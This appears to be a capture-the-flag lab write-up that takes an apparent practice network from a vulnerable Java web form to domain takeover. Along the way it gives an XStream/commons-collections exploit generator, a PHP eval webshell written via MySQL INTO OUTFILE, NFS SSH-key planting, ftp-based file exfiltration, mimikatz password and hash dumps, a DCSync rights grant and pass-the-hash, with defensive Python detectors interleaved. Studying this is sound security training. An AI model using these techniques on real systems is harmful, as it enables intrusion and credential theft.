Target description:
In this range you play a penetration tester hired by a small tech start-up called Delivery to assess the company. The objective is to take over the domain controller in order to evaluate the company's security posture. There are 4 flags in total, spread across different hosts.
FLAG1
Level brief:
Test the security of the Delivery web application exposed to the Internet and try to gain the ability to execute arbitrary commands on that server.
Information gathering
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.99.253.50:8080 open
39.99.253.50:21 open
39.99.253.50:22 open
39.99.253.50:80 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.253.50 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp 39.99.253.50:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle http://39.99.253.50:8080 code:200 len:3655 title:公司发货单
Anonymous FTP login is allowed.
The share contains a pom.xml, and its dependency list is the giveaway: xstream 1.4.16 (before 1.4.18, the release that switched XStream's default to a type allowlist) sitting next to commons-collections 3.2.1 (before 3.2.2 disabled serialization of the Transformer gadgets). That is the classic XStream deserialization setup.
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.2</version>
        <relativePath/>
        <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>ezjava</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjava</name>
    <description>ezjava</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.16</version>
        </dependency>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>
Port 8080 serves a form application (title 公司发货单, a company delivery-note form), which is presumably the endpoint that hands user input to XStream. The pieces line up.
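As an added example (not part of the original writeup), a small Python script that does this triage automatically: it parses the pom.xml pulled from the FTP share, resolves ${property} versions, and flags dependencies below the release that changed their deserialization behaviour (xstream 1.4.18, commons-collections 3.2.2). The embedded pom is a trimmed copy of the one above; the commons-collections version is routed through a property here, which the original does not do, purely to exercise the resolver.

```python
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}
PROP_RE = re.compile(r"\$\{([^}]+)\}")

# groupId:artifactId -> (first release that changed the default deserialization behaviour, why it matters)
KNOWN_GADGET_DEPS = {
    ("com.thoughtworks.xstream", "xstream"):
        ("1.4.18", "no type allowlist by default; arbitrary object graphs are deserialized"),
    ("commons-collections", "commons-collections"):
        ("3.2.2", "InvokerTransformer/ChainedTransformer serializable: CC gadget chains work"),
}

# Trimmed copy of the pom.xml pulled from the FTP share. The commons-collections version is routed
# through a property here (the original hard-codes 3.2.1) only to exercise the property resolver.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <parent>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId>
    <version>2.7.2</version>
  </parent>
  <groupId>com.example</groupId>
  <artifactId>ezjava</artifactId>
  <version>0.0.1-SNAPSHOT</version>
  <properties>
    <java.version>1.8</java.version>
    <cc.version>3.2.1</cc.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
      <groupId>com.thoughtworks.xstream</groupId>
      <artifactId>xstream</artifactId>
      <version>1.4.16</version>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>${cc.version}</version>
    </dependency>
  </dependencies>
</project>"""


def version_key(v):
    """Numeric tuple for comparison; qualifiers such as -SNAPSHOT are ignored."""
    return tuple(int("".join(ch for ch in part if ch.isdigit()) or 0) for part in v.split("."))


def _text(elem, tag):
    child = elem.find("m:" + tag, NS)
    return (child.text or "").strip() if child is not None else ""


def _properties(root):
    props = {"project.version": _text(root, "version")}
    props_elem = root.find("m:properties", NS)
    if props_elem is not None:
        for child in props_elem:
            props[child.tag.split("}", 1)[-1]] = (child.text or "").strip()
    return props


def _resolve(value, props):
    """Expand ${name} references; unknown names are left in place, depth is bounded."""
    for _ in range(5):
        expanded = PROP_RE.sub(lambda m: props.get(m.group(1), m.group(0)), value)
        if expanded == value:
            break
        value = expanded
    return value


def find_gadget_deps(pom_xml):
    """[(groupId:artifactId, version, note)] for dependencies below a known cut-off release."""
    root = ET.fromstring(pom_xml)
    props = _properties(root)
    findings = []
    for dep in root.findall("m:dependencies/m:dependency", NS):
        key = (_text(dep, "groupId"), _text(dep, "artifactId"))
        version = _resolve(_text(dep, "version"), props)
        if key not in KNOWN_GADGET_DEPS or not version or "${" in version:
            continue  # unknown artifact, or version managed by the parent BOM: cannot decide from this file alone
        fixed_in, why = KNOWN_GADGET_DEPS[key]
        if version_key(version) < version_key(fixed_in):
            findings.append((":".join(key), version, f"{why}; changed in {fixed_in}"))
    return findings


if __name__ == "__main__":
    for coord, ver, note in find_gadget_deps(SAMPLE_POM):
        print(f"{coord} {ver}: {note}")
```

Dependencies without a literal version (managed by the Spring Boot parent) are skipped rather than guessed; resolving those needs the parent BOM, not just this file.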

So we go straight for a TemplatesImpl sink (the CC3 part) driven through the CC6-style HashSet / TiedMapEntry / LazyMap trigger, loading a Behinder (冰蝎) in-memory shell; the resulting XML is what gets sent to the form on port 8080:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.thoughtworks.xstream.XStream;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.TransformerConfigurationException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class Main {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException, ClassNotFoundException {

        TemplatesImpl templates = new TemplatesImpl();

        // _name must be non-null and _bytecodes carries the malicious class.
        // When testing the chain locally through plain Java serialization, _tfactory also has to be
        // set to a TransformerFactoryImpl by hand (TemplatesImpl.readObject does that on the real target).
        Class c = templates.getClass();
        Field nameField = c.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates, "xrntkk");

        Field bytecodesField = c.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] bytecodes = Base64.getDecoder().decode("内存马");   // base64 of the memory-shell class (omitted here)
        byte[][] shellCode = {bytecodes};
        bytecodesField.set(templates, shellCode);

//        Field tfactoryField = c.getDeclaredField("_tfactory");
//        tfactoryField.setAccessible(true);
//        tfactoryField.set(templates, new TransformerFactoryImpl());

        // Real chain: ConstantTransformer hands back the TemplatesImpl, InvokerTransformer calls
        // newTransformer() on it, which defines and instantiates the class held in _bytecodes.
        Transformer[] transformers_test = new Transformer[]{};
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer", null, null)
        };
        // Build the LazyMap with an empty chain first so the payload does not fire locally
        // while the object graph is being assembled.
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers_test);

        Map lazyMap = LazyMap.decorate(new HashMap<>(), chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "123");

        // HashSet.add() calls TiedMapEntry.hashCode() -> LazyMap.get("123"). The same call happens
        // again on the target when the HashSet is rebuilt during deserialization.
        HashSet<Object> hashSet = new HashSet<>();
        hashSet.add(tiedMapEntry);

        // get() above cached "123" in the backing map; drop it so the factory is consulted again on the target.
        lazyMap.remove("123");

        // Swap in the real transformer chain through reflection.
        Class lazyClass = Class.forName("org.apache.commons.collections.map.LazyMap");
        Field lzField = lazyClass.getDeclaredField("factory");
        lzField.setAccessible(true);
        lzField.set(lazyMap, new ChainedTransformer(transformers));

        // Local sanity check through Java serialization (needs the _tfactory block above):
//        serialize(hashSet);
//        unserialize();
        XStream xStream = new XStream();
        String xml = xStream.toXML(hashSet);
        System.out.println(xml);
    }

    public static void serialize(Object o) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(o);
    }

    public static Object unserialize() throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("ser.bin"));
        Object o = ois.readObject();
        return o;
    }
}
The shell runs as root, and the flag sits under /root:
root@ubuntu:/usr/bin# cat /root/flag/flag01.txt
██████ ██ ██ ██ ██
██░░░░██ █████ ░██ ░██ ░██ ░░
██ ░░ ██████ ███████ ██░░░██ ██████ ██████ ██████ ██ ██ ░██ ██████ ██████ ██ ██████ ███████ ██████
░██ ██░░░░██░░██░░░██░██ ░██░░██░░█ ░░░░░░██ ░░░██░ ░██ ░██ ░██ ░░░░░░██ ░░░██░ ░██ ██░░░░██░░██░░░██ ██░░░░
░██ ░██ ░██ ░██ ░██░░██████ ░██ ░ ███████ ░██ ░██ ░██ ░██ ███████ ░██ ░██░██ ░██ ░██ ░██░░█████
░░██ ██░██ ░██ ░██ ░██ ░░░░░██ ░██ ██░░░░██ ░██ ░██ ░██ ░██ ██░░░░██ ░██ ░██░██ ░██ ░██ ░██ ░░░░░██
░░██████ ░░██████ ███ ░██ █████ ░███ ░░████████ ░░██ ░░██████ ███░░████████ ░░██ ░██░░██████ ███ ░██ ██████
░░░░░░ ░░░░░░ ░░░ ░░ ░░░░░ ░░░ ░░░░░░░░ ░░ ░░░░░░ ░░░ ░░░░░░░░ ░░ ░░ ░░░░░░ ░░░ ░░ ░░░░░░
flag01: flag{b1bd4b09-1eb2-4cbc-8349-a9a76eeff680}
FLAG2
Level brief:
To share files across machines and operating systems the administrator deployed NFS on the internal network, a decision that puts that server at risk. Your task is to take control of it and assess its security.
Information gathering
root@ubuntu:/tmp# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.13.14  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe2a:6741  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:2a:67:41  txqueuelen 1000  (Ethernet)
        RX packets 146856  bytes 196011094 (196.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 39307  bytes 14862712 (14.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1358  bytes 125704 (125.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1358  bytes 125704 (125.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
root@ubuntu:/# ./fscan -h 172.22.13.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
   fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.57:80 open
172.22.13.14:21 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:445 open
172.22.13.28:445 open
172.22.13.6:139 open
172.22.13.28:139 open
172.22.13.6:88 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.14:9999 open
[*] alive ports len is: 17
start vulscan
[*] NetInfo
[*]172.22.13.6
   [->]WIN-DC
   [->]172.22.13.6
[*] NetInfo
[*]172.22.13.28
   [->]WIN-HAUWOLAO
   [->]172.22.13.28
[*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[+] ftp 172.22.13.14:21:anonymous
   [->]1.txt
   [->]pom.xml
[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC
[*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] mysql 172.22.13.28:3306:root 123456
Done 17/17
[*] Scan finished, elapsed: 17.106463505s
That turns up three more hosts besides the entry box:
[2026-03-09 20:08:47] [SUCCESS] target 172.22.13.14 alive (ICMP)   // entry host
[2026-03-09 20:08:47] [SUCCESS] target 172.22.13.6 alive (ICMP)    // DC (WIN-DC, domain XIAORANG)
[2026-03-09 20:08:47] [SUCCESS] target 172.22.13.28 alive (ICMP)   // Windows Server 2016 (WIN-HAUWOLAO): OA login portal on 80, MySQL root/123456
[2026-03-09 20:08:47] [SUCCESS] target 172.22.13.57 alive (ICMP)   // CentOS
The level brief points at NFS, so first ask the portmapper on the CentOS box whether nfs and mountd are registered:
┌──(root㉿XrntkkDesktop)-[/home/xrntkk]
└─# proxychains4 -q rpcinfo -p 172.22.13.57
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 20048 mountd
100005 1 tcp 20048 mountd
100005 2 udp 20048 mountd
100005 2 tcp 20048 mountd
100005 3 udp 20048 mountd
100005 3 tcp 20048 mountd
100024 1 udp 58037 status
100024 1 tcp 39962 status
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100227 3 udp 2049 nfs_acl
100021 1 udp 58230 nlockmgr
100021 3 udp 58230 nlockmgr
100021 4 udp 58230 nlockmgr
100021 1 tcp 41894 nlockmgr
100021 3 tcp 41894 nlockmgr
100021 4 tcp 41894 nlockmgr
Listing the exports shows /home/joyce shared with every client (the * wildcard):
┌──(root㉿XrntkkDesktop)-[/home/xrntkk]
└─# proxychains4 -q showmount -e 172.22.13.57
Export list for 172.22.13.57:
/home/joyce *
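As an added example (not from the original writeup), the same check in Python: parse showmount -e output and an /etc/exports file and report what makes an export abusable (wildcard clients, rw, no_root_squash, insecure). The showmount text is the output above; the /etc/exports content is constructed and its options are an assumption, since the real file on 172.22.13.57 is not shown (the root-owned .ssh that sshd accepts below, and the NFS privilege escalation mentioned later, both imply no_root_squash).

```python
import re

# showmount -e output from the page.
SAMPLE_SHOWMOUNT = """\
Export list for 172.22.13.57:
/home/joyce *
"""

# Constructed /etc/exports. The options on /home/joyce are an assumption (the real file is not shown);
# the other lines exist only to exercise the parser.
SAMPLE_EXPORTS = """\
# sample /etc/exports
/home/joyce  *(rw,sync,no_root_squash)
/srv/backup  172.22.13.0/24(ro,sync)
/srv/www     -sync,rw 172.22.13.28 @trusted(ro)
/tmp/drop    (rw)
"""


def parse_showmount(text):
    """[(path, [client, ...])] from `showmount -e`; clients are comma-separated on each line."""
    exports = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Export list"):
            continue
        path, _, rest = line.partition(" ")
        exports.append((path, [c for c in rest.strip().split(",") if c]))
    return exports


def parse_exports(text):
    """Yield (path, client, [options]) from /etc/exports content, handling '-opts' default
    tokens and the bare '(opts)' form that exportfs treats as a wildcard host."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *tokens = line.split()
        defaults, clients = [], []
        for tok in tokens:
            if tok.startswith("-"):
                defaults = tok[1:].split(",")
                continue
            m = re.match(r"([^(]*)(?:\(([^)]*)\))?$", tok)
            if not m:
                continue
            opts = defaults + ([o for o in m.group(2).split(",") if o] if m.group(2) else [])
            clients.append((m.group(1) or "*", opts))
        if not clients:
            clients.append(("*", defaults))
        for host, opts in clients:
            yield path, host, opts


def effective_options(opts):
    """Fold the option list onto the Linux exportfs defaults (ro, root_squash, secure)."""
    eff = {"rw": False, "root_squash": True, "secure": True}
    for o in opts:
        if o == "rw":
            eff["rw"] = True
        elif o == "ro":
            eff["rw"] = False
        elif o == "no_root_squash":
            eff["root_squash"] = False
        elif o in ("root_squash", "all_squash"):
            eff["root_squash"] = True
        elif o == "insecure":
            eff["secure"] = False
        elif o == "secure":
            eff["secure"] = True
    return eff


def audit_exports(text):
    """[(path, host, [issue, ...])] for every export entry with something worth reporting."""
    findings = []
    for path, host, opts in parse_exports(text):
        eff = effective_options(opts)
        issues = []
        if "*" in host:
            issues.append("wildcard client: any host that can reach port 2049 can mount it")
        if eff["rw"]:
            issues.append("writable")
        if not eff["root_squash"]:
            issues.append("no_root_squash: a client's root writes as root (SUID binaries, root-owned authorized_keys)")
        if not eff["secure"]:
            issues.append("insecure: mounts from unprivileged ports accepted, no root needed on the client")
        if issues:
            findings.append((path, host, issues))
    return findings


if __name__ == "__main__":
    print(parse_showmount(SAMPLE_SHOWMOUNT))
    for path, host, issues in audit_exports(SAMPLE_EXPORTS):
        print(path, host, "->", "; ".join(issues))
```

On the target itself the definitive source is /etc/exports (or exportfs -v), which also shows the squash options that showmount never reports.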
Mount it on the entry host:
root@ubuntu:/# mkdir mount1
root@ubuntu:/# mount -t nfs 172.22.13.57:/home/joyce /mount1
The directory is empty, so plant an SSH key for joyce and log in. The files are created as root over NFS, which only works like this when the export does not squash root (no_root_squash); with root_squash the client's root is mapped to nfsnobody and the mkdir in joyce's home would normally be refused. sshd additionally requires .ssh and authorized_keys not to be group- or world-writable:
root@ubuntu:/mount1# rm -rf .ssh/
root@ubuntu:/mount1# mkdir .ssh
root@ubuntu:/mount1# ssh-keygen -t rsa -b 4096
root@ubuntu:/mount1# cat /root/.ssh/id_rsa.pub >> /mount1/.ssh/authorized_keys
root@ubuntu:/mount1# ssh joyce@172.22.13.57
Last login: Thu Aug 11 18:16:01 2022
Welcome to Alibaba Cloud Elastic Compute Service !
[joyce@centos ~]$

SUID privilege escalation
[joyce@centos ~]$ find / -perm -u=s -type f 2>/dev/null
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/bin/sudo
/usr/bin/chage
/usr/bin/at
/usr/bin/mount
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/ftp
/usr/bin/umount
Two ways forward. One is the NFS route: since the export does not squash root (which the root-owned .ssh that sshd just accepted suggests), a SUID-root binary copied onto the share from the entry host runs as root on CentOS (see Linux提权基础分享和讨论 on 先知社区). The other uses the odd entry in the list above: /usr/bin/ftp carries the SUID bit, so the ftp client opens local files as root, and a put of a root-only file sends it out. (pkexec is in the list too, and the prompt below shows a CVE-2021-4034 checkout in joyce's home, but the writeup takes the ftp route.) For that, start an FTP server on the entry host:
root@ubuntu:/mount1# python3 -m pyftpdlib -p 4400 -u xrntkk -P xrntkk -w
[I 2026-03-09 21:20:53] concurrency model: async
[I 2026-03-09 21:20:53] masquerade (NAT) address: None
[I 2026-03-09 21:20:53] passive ports: None
[I 2026-03-09 21:20:53] >>> starting FTP server on 0.0.0.0:4400, pid=5235 <<<
Then, from CentOS, connect to it and use ftp's put command to send the file out; the SUID bit means the client reads /flag02.txt as root:
[joyce@centos CVE-2021-4034-main]$ ftp 172.22.13.14 4400
Connected to 172.22.13.14 (172.22.13.14).
220 pyftpdlib 1.5.6 ready.
Name (172.22.13.14:joyce): xrntkk
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put /flag02.txt
local: /flag02.txt remote: /flag02.txt
227 Entering passive mode (172,22,13,14,214,225).
125 Data connection already open. Transfer starting.
226 Transfer complete.
466 bytes sent in 1.5e-05 secs (31066.67 Kbytes/sec)
ftp>
Which gives flag02:
[joyce@centos CVE-2021-4034-main]$ cat flag02.txt
SSS h d CCC d t l
S h d C d t ii l
SSS hhh aa ddd ooo w w C rrr eee ddd eee nnn ttt aa l ss
S h h a a d d o o w w w C r e e d d e e n n t ii a a l s
SSSS h h aaa ddd ooo w w CCC r ee ddd ee n n tt ii aaa l ss
flag02: flag{190fe837-c783-4b6a-ba00-ac5c64fe58c6}
hint: relay race
FLAG3
Level brief:
A domain administrator's misconfiguration has left some domain user with a dangerous DACL. Find that user and assess the damage the mistake makes possible.
MySQL weak password
[+] mysql 172.22.13.28:3306:root 123456

secure_file_priv is empty, so SELECT ... INTO OUTFILE may write to any path the MySQL service account can reach, including the web root.
The site is served by phpstudy, so the document root is C:\phpstudy_pro\WWW on the same box.

Write the webshell straight into the web root:
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
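For the blue-team side of this step, an added Python example (not from the original writeup): a detector that runs over MySQL general-log lines, extracts INTO OUTFILE / INTO DUMPFILE targets, and rates them by whether they land under a web root with an executable extension; it also models the secure_file_priv rule so you can tell whether a given write would have been permitted. The log lines are constructed; the third query mirrors the one above.

```python
import re

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")
FILE_WRITE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(.+?)\2", re.IGNORECASE)
RECON = re.compile(r"secure_file_priv|@@datadir|@@basedir|@@plugin_dir|\bLOAD_FILE\s*\(", re.IGNORECASE)
WEB_ROOTS = ("/www/", "/htdocs/", "/wwwroot/", "/var/www/", "/inetpub/", "/webapps/", "/public_html/")
EXEC_EXT = (".php", ".phtml", ".jsp", ".jspx", ".asp", ".aspx", ".so", ".dll")

# Constructed general-log excerpt (log_output=FILE layout). The third query mirrors the webshell write above.
SAMPLE_GENERAL_LOG = """\
2026-03-09T12:03:41.123456Z    12 Connect  root@172.22.13.14 on  using TCP/IP
2026-03-09T12:03:42.001122Z    12 Query    select @@secure_file_priv
2026-03-09T12:03:55.443311Z    12 Query    select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php"
2026-03-09T12:04:10.000000Z    13 Query    SELECT name FROM orders WHERE id = 7
2026-03-09T12:04:30.000000Z    13 Query    SELECT 0x4d5a INTO DUMPFILE '/var/lib/mysql/plugin/udf.so'
2026-03-09T12:04:31.000000Z    13 Query    SELECT id, total FROM orders INTO OUTFILE '/var/lib/mysql-files/export.csv'
"""


def _norm(path):
    return path.replace("\\", "/")


def detect_file_writes(log_text):
    """Scan general-log lines; return dicts for file writes (OUTFILE/DUMPFILE) and for the
    recon queries that usually precede them, rated by where the write lands."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        query = m.group("arg")
        w = FILE_WRITE.search(query)
        if w:
            path = _norm(w.group(3))
            low = path.lower()
            in_webroot = any(root in low for root in WEB_ROOTS)
            executable = low.endswith(EXEC_EXT)
            severity = ("critical" if in_webroot and executable   # webshell
                        else "high" if in_webroot or executable   # UDF library, or a non-script file under the web root
                        else "medium")                            # any server-side file write is still worth a look
            hits.append({"ts": m.group("ts"), "thread": int(m.group("thread")),
                         "kind": w.group(1).upper(), "path": path, "severity": severity})
        elif RECON.search(query):
            hits.append({"ts": m.group("ts"), "thread": int(m.group("thread")),
                         "kind": "RECON", "path": None, "severity": "low"})
    return hits


def outfile_allowed(secure_file_priv, target):
    """MySQL's secure_file_priv rule: NULL disables file I/O, '' allows any path, a directory
    allows only files inside it (a plain prefix match here; the server canonicalises first)."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = _norm(secure_file_priv).rstrip("/") + "/"
    return _norm(target).startswith(base)


if __name__ == "__main__":
    for h in detect_file_writes(SAMPLE_GENERAL_LOG):
        print(h)
    print("with secure_file_priv=C:/mysql-files:", outfile_allowed("C:/mysql-files", "C:/phpstudy_pro/WWW/1.php"))
```

The fix on the server side is the last function's third case: point secure_file_priv at a directory nobody serves, or set it to NULL if the application never needs file I/O, and the INTO OUTFILE above fails with "The MySQL server is running with the --secure-file-priv option".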

The shell runs with enough privilege to add a local administrator, so create one and RDP in:
C:\phpstudy_pro\WWW> net user xrntkk Abc123456 /add
The command completed successfully.
C:\phpstudy_pro\WWW> net localgroup administrators xrntkk /add
The command completed successfully.
That gives flag03.

FLAG4
First dump credentials with mimikatz on WIN-HAUWOLAO; the kerberos package still holds chenglei's plaintext password:
Authentication Id : 0 ; 90614 (00000000:000161f6)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2026/3/9 19:27:29
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
chenglei is a domain user, so RDP to 172.22.13.28 as chenglei and enumerate the domain from there:
proxychains4 xfreerdp3 /v:172.22.13.28 /u:chenglei /p:Xt61f3LBhg1
chenglei turns out to hold WriteDacl on the domain object (DC=xiaorang,DC=lab):

WriteDacl on the domain object lets the principal rewrite that object's DACL, so chenglei can grant himself the two replication extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that DCSync requires and then pull every account's hash from the DC.
Use impacket's dacledit.py to add the DCSync rights for chenglei:
proxychains4 -q python3 dacledit.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6
Now DCSync the domain. With mimikatz:
C:\Users\chenglei\Downloads>mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'WIN-DC.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1104 zhangwen fa7d776fdfc82d3f43c9d8b7f5312d77 512
502 krbtgt cb976ec1a1bf8a14a15142c6fecc540e 514
1106 zhangtao e786c4a4987ced162c496d0519496729 512
1000 WIN-DC$ c724ec902e48135423b92df651198712 532480
500 Administrator 6341235defdaed66fb7b682665752c9a 512
1105 chenglei 0c00801c30594a1b8eaa889d237c5382 512
1103 WIN-HAUWOLAO$ 3d35e38416645854338db6b1c4b32f59 4096
mimikatz(commandline) # exit
Bye!
Or with impacket-secretsdump (-just-dc-ntlm returns only the NTLM hashes from NTDS):
proxychains4 -q impacket-secretsdump xiaorang.lab/chenglei:Xt61f3LBhg1@172.22.13.28 -target-ip 172.22.13.6 -just-dc-ntlm
With the Administrator hash, pass-the-hash to the DC and read the flag:
proxychains4 -q impacket-smbexec -hashes :6341235defdaed66fb7b682665752c9a administrator@172.22.13.6 -codec gbk
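As an added Python example (not from the original writeup), the ACL reasoning above made explicit: parse the domain object's DACL from an SDDL string, compute a principal's effective rights, and report whether it can DCSync right now (both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, or an unqualified control-access / generic-all grant) or can make itself able to (WriteDacl or WriteOwner). The SDDL is constructed; the domain SID and RIDs are taken from the mimikatz output above, and the function that produces the ACEs a "-rights DCSync" write adds is a model of the result, not dacledit's code. Group membership is not resolved: the caller passes the token's SIDs.

```python
import re

# Extended-right GUIDs DCSync needs on the domain NC head (well-known schema values).
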